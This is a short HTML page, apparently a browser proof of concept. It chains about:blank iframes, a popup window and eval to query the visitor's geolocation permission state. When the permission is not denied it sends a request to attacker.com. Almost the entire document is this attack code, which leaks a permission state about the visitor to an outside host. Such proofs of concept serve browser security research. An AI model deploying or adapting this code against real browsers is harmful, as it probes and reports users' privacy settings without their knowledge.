<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGDlylyGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGDlylyGGGGG.onload=_=>GGGGGDlylyGGGGG.contentWindow.eval("w=window.open('about:blank'); w.document.write('<iframe id=GGGDlylyGGG src=about:blank><\/iframe><script>GGGDlylyGGG.onload=_=>GGGDlylyGGG.contentWindow.eval(\x22navigator.permissions.query({name:`geolocation`}).then(r=>{if(r.state!=`denied`)fetch(`https://attacker.com/report/report?query=1`)})\x22);GGGDlylyGGG.contentWindow.location.reload();<\/script>');");GGGGGDlylyGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>